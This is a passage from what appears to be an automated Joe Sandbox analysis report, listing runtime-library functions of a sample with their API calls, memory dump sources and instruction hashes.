                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: InitOnce$BeginCompleteInitialize
                                                                                                                                                                                                                            • String ID: xN"
                                                                                                                                                                                                                            • API String ID: 51270584-507102101
                                                                                                                                                                                                                            • Opcode ID: 15a6b9a662bf01ad4cc7d5c066ffabb5268e8970f52e35e0c71922292b4c9a8d
                                                                                                                                                                                                                            • Instruction ID: fbf23d2ec4b0c7a81b6a1ee21ad297f269f21f04557c8594e0e35878716e5e6b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 15a6b9a662bf01ad4cc7d5c066ffabb5268e8970f52e35e0c71922292b4c9a8d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 99F0A731602112BFAF307B92EC49EAF3B6DEF86B917050069F505D2041DB60DD40D6B1
                                                                                                                                                                                                                            Function 0019175B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00191762
                                                                                                                                                                                                                            • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0019179A
                                                                                                                                                                                                                              • Part of subcall function 001988C0: _Yarn.LIBCPMT ref: 001988DF
                                                                                                                                                                                                                              • Part of subcall function 001988C0: _Yarn.LIBCPMT ref: 00198903
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                                                                                                                                            • String ID: bad locale name
                                                                                                                                                                                                                            • API String ID: 1908188788-1405518554
                                                                                                                                                                                                                            • Opcode ID: 0df7849ff7cfebbcd5dbbdb2b207093ca5df9a34e17bcaecbb4e3a8357520024
                                                                                                                                                                                                                            • Instruction ID: 8c400f80431aa8970872495b4f9b5934a25b1fbbd73f80e5053ba9b03ae17468
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0df7849ff7cfebbcd5dbbdb2b207093ca5df9a34e17bcaecbb4e3a8357520024
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BBF03A72919B409E8334DFBA9481443FBE4BE293113908E2FE0DEC3A11D730E404CB6A

                                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                                            Function 001B051E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,2000000B,001B083C,00000002,00000000,?,?,?,001B083C,?,00000000), ref: 001B05B7
                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,20001004,001B083C,00000002,00000000,?,?,?,001B083C,?,00000000), ref: 001B05E0
                                                                                                                                                                                                                            • GetACP.KERNEL32(?,?,001B083C,?,00000000), ref: 001B05F5
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1711945445.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711929926.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711967695.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711984669.00000000001C2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712027484.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712044851.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: InfoLocale
                                                                                                                                                                                                                            • String ID: ACP$OCP
                                                                                                                                                                                                                            • API String ID: 2299586839-711371036
                                                                                                                                                                                                                            • Opcode ID: 852f71fa3954b87abe3c0b9fc14055e5c46a5181198f5869401ded7f8faa0bf4
                                                                                                                                                                                                                            • Instruction ID: 82b011fef9ccf9ae3ed465798c016987a69ea2f0eea9d8ad56bbb1631a143b29
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 852f71fa3954b87abe3c0b9fc14055e5c46a5181198f5869401ded7f8faa0bf4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3D21C572A04101EAEB36DF24CD01AD773A6AB6CB60B568564F94AD7900EB32DE81CB50
                                                                                                                                                                                                                            Function 001B06F3 Relevance: 7.7, APIs: 5, Instructions: 183COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 001A8DB3: GetLastError.KERNEL32(?,00000008,001A69CC), ref: 001A8DB7
                                                                                                                                                                                                                              • Part of subcall function 001A8DB3: SetLastError.KERNEL32(00000000,001C0710,00000024,0019DDA3), ref: 001A8E59
                                                                                                                                                                                                                            • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 001B07FF
                                                                                                                                                                                                                            • IsValidCodePage.KERNEL32(00000000), ref: 001B0848
                                                                                                                                                                                                                            • IsValidLocale.KERNEL32(?,00000001), ref: 001B0857
                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 001B089F
                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 001B08BE
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1711945445.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711929926.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711967695.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711984669.00000000001C2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712027484.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712044851.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 415426439-0
                                                                                                                                                                                                                            • Opcode ID: 43cb7857c5bbbb30606c06a37dd78bd1ccb2d4733561ece971edaeb8e5a5228b
                                                                                                                                                                                                                            • Instruction ID: ab91f24a37110ecd09f2e4ef0adee7bf4937ad7e66885c6e84785a2273ebd7f1
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 43cb7857c5bbbb30606c06a37dd78bd1ccb2d4733561ece971edaeb8e5a5228b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AD516171D00209ABDB22EFA5CC45AEFB7B8BF1C700F144569F551E7191EB70EA408B61
                                                                                                                                                                                                                            Function 001AFD8F Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 001A8DB3: GetLastError.KERNEL32(?,00000008,001A69CC), ref: 001A8DB7
                                                                                                                                                                                                                              • Part of subcall function 001A8DB3: SetLastError.KERNEL32(00000000,001C0710,00000024,0019DDA3), ref: 001A8E59
                                                                                                                                                                                                                            • GetACP.KERNEL32(?,?,?,?,?,?,001A4F88,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 001AFE50
                                                                                                                                                                                                                            • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,001A4F88,?,?,?,00000055,?,-00000050,?,?), ref: 001AFE7B
                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 001AFFDE
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1711945445.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711929926.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711967695.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711984669.00000000001C2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712027484.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712044851.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorLast$CodeInfoLocalePageValid
                                                                                                                                                                                                                            • String ID: utf8
                                                                                                                                                                                                                            • API String ID: 607553120-905460609
                                                                                                                                                                                                                            • Opcode ID: 9a3584d315ad6f64df94caaf67ded1fd81df36e0f36d39fe87e574df88664115
                                                                                                                                                                                                                            • Instruction ID: 4a88e39a5522a0a29a3ad830c47c05d5250ecaa0f5e5d5bcc8595d01fa40cd65
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9a3584d315ad6f64df94caaf67ded1fd81df36e0f36d39fe87e574df88664115
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7471047AA00206AADB25ABB4CC86BA6B3A8EF1B700F11403DF505D7191FB74ED428760
                                                                                                                                                                                                                            Function 001A7C32 Relevance: 6.3, APIs: 4, Instructions: 337COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1711945445.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711929926.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711967695.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711984669.00000000001C2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712027484.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712044851.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _strrchr
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3213747228-0
                                                                                                                                                                                                                            • Opcode ID: 345b19b73ae581e04342a76ae529d1a1f04ad07f21d6b651d60a02739456ec14
                                                                                                                                                                                                                            • Instruction ID: 0fbef775e9e7da18664adbefb1efe1b6255d57f6e238e56e0ded49500cb80c44
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 345b19b73ae581e04342a76ae529d1a1f04ad07f21d6b651d60a02739456ec14
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 74B14B769082459FDB158F68CC91BFEBBA5EF5A310F1581AAE815AB2C1D3349F01C7A0
                                                                                                                                                                                                                            Function 0019A085 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 0019A091
                                                                                                                                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 0019A15D
                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0019A176
                                                                                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 0019A180
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1711945445.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711929926.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711967695.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711984669.00000000001C2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712027484.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712044851.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 254469556-0
                                                                                                                                                                                                                            • Opcode ID: adfb7e1cd21b692c857b244e3a139cf9034c76f3aabfba32c53cea0ac258a601
                                                                                                                                                                                                                            • Instruction ID: 23234def3331fcac2f13c501a3dd4852386ecc6813e7625ce343172bf7bd0869
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: adfb7e1cd21b692c857b244e3a139cf9034c76f3aabfba32c53cea0ac258a601
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F5310875D01218DBDF21EFA5D9497CDBBB8AF18300F5041AAE40DAB250EB759B84CF85
                                                                                                                                                                                                                            Function 00192F7C Relevance: 1.3, Strings: 1, Instructions: 55COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1711945445.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711929926.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711967695.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711984669.00000000001C2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712027484.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712044851.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: `*"
                                                                                                                                                                                                                            • API String ID: 0-228433918
                                                                                                                                                                                                                            • Opcode ID: 76358a7298f06c9afca292a05df3ca2594afb3adad8c1c2d81263d23fcc20480
                                                                                                                                                                                                                            • Instruction ID: 75013d7f6e6bfade49deb9388ac6ee612568bced2f33c097b6d74a02f7780193
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 76358a7298f06c9afca292a05df3ca2594afb3adad8c1c2d81263d23fcc20480
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 65110232204304AFE718EF24D801F6AB394FF58720F04081DF964873D2DBB1EA01C696
                                                                                                                                                                                                                            Function 001973C5 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 001973CC
                                                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 001973D6
                                                                                                                                                                                                                            • int.LIBCPMT ref: 001973ED
                                                                                                                                                                                                                              • Part of subcall function 00191830: std::_Lockit::_Lockit.LIBCPMT ref: 00191841
                                                                                                                                                                                                                              • Part of subcall function 00191830: std::_Lockit::~_Lockit.LIBCPMT ref: 0019185B
                                                                                                                                                                                                                            • codecvt.LIBCPMT ref: 00197410
                                                                                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 00197427
                                                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00197447
                                                                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 00197454
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1711945445.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711929926.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711967695.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711984669.00000000001C2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712027484.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712044851.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                                                                                                                                                                            • String ID: (B"
                                                                                                                                                                                                                            • API String ID: 2133458128-3727729193
                                                                                                                                                                                                                            • Opcode ID: b83049d65d6de4685eeaff54798ac9ec26b39d63af27ba5e7d732eca5cd03d49
                                                                                                                                                                                                                            • Instruction ID: 84870491a8d04261862ea8d05ae0ccebbc61a891c73630b256a33adc09a09913
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b83049d65d6de4685eeaff54798ac9ec26b39d63af27ba5e7d732eca5cd03d49
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3A01F531D24126EBCF05EBA8E8456BD7BB1AF90724F280549F8106B2D2CF749D42C781
                                                                                                                                                                                                                            Function 001992CD Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 19libraryloaderCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 001992D3
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 001992E1
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 001992F2
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 00199303
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1711945445.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711929926.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711967695.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711984669.00000000001C2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712027484.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712044851.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                            • String ID: GetCurrentPackageId$GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                                                                                                                                                            • API String ID: 667068680-1247241052
                                                                                                                                                                                                                            • Opcode ID: dc038cd96ca53a9b0488484623bebb7ef3fecf63435a069f90062a6cac2134e2
                                                                                                                                                                                                                            • Instruction ID: d5a7187d1098fa8030c5b4dbb75a129db3945fdb74396fe5e4e6df1eb12df858
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dc038cd96ca53a9b0488484623bebb7ef3fecf63435a069f90062a6cac2134e2
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 77E0EC71599211FBD7117FBAFC0DCD53AB4AB657123021361F825E26A0DBBC04818B60
                                                                                                                                                                                                                            Function 001AB85E Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 298COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1711945445.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711929926.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711967695.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711984669.00000000001C2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712027484.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712044851.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 0-3907804496
                                                                                                                                                                                                                            • Opcode ID: 9640118504dca5fc609eca447f737326d7e929f34b3ad63adee416e02cbef6e9
                                                                                                                                                                                                                            • Instruction ID: 308ea2a21fbcea147457a620cf1935658d02ad4d49831edc4724b1705a785931
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9640118504dca5fc609eca447f737326d7e929f34b3ad63adee416e02cbef6e9
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2EB11378E08289AFDF15DF99D8C1BADBBB1BF6A314F144158E401AB297C7709D42CB60
                                                                                                                                                                                                                            Function 001990E3 Relevance: 12.2, APIs: 8, Instructions: 175COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 0019912C
                                                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 00199158
                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00199197
                                                                                                                                                                                                                            • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001991B4
                                                                                                                                                                                                                            • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 001991F3
                                                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 00199210
                                                                                                                                                                                                                            • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00199252
                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00199275
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1711945445.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711929926.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711967695.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711984669.00000000001C2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712027484.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712044851.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2040435927-0
                                                                                                                                                                                                                            • Opcode ID: 15ed452b2f97c8035117caa678f8b3f0553a9704b12cbd5edbf1a9c3eceb8512
                                                                                                                                                                                                                            • Instruction ID: 7fd50b96def1b45317b9e7a953593e12522771d6718a0916f9754a99ebb74482
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 15ed452b2f97c8035117caa678f8b3f0553a9704b12cbd5edbf1a9c3eceb8512
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D551AE72A0020ABFEF209FA9CC45FAB7BA9EF55750F25452DF904AA150D734DD50CBA0
                                                                                                                                                                                                                            Function 0019CE02 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 303COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • type_info::operator==.LIBVCRUNTIME ref: 0019CF21
                                                                                                                                                                                                                            • ___TypeMatch.LIBVCRUNTIME ref: 0019D02F
                                                                                                                                                                                                                            • CallUnexpected.LIBVCRUNTIME ref: 0019D19C
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1711945445.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711929926.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711967695.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
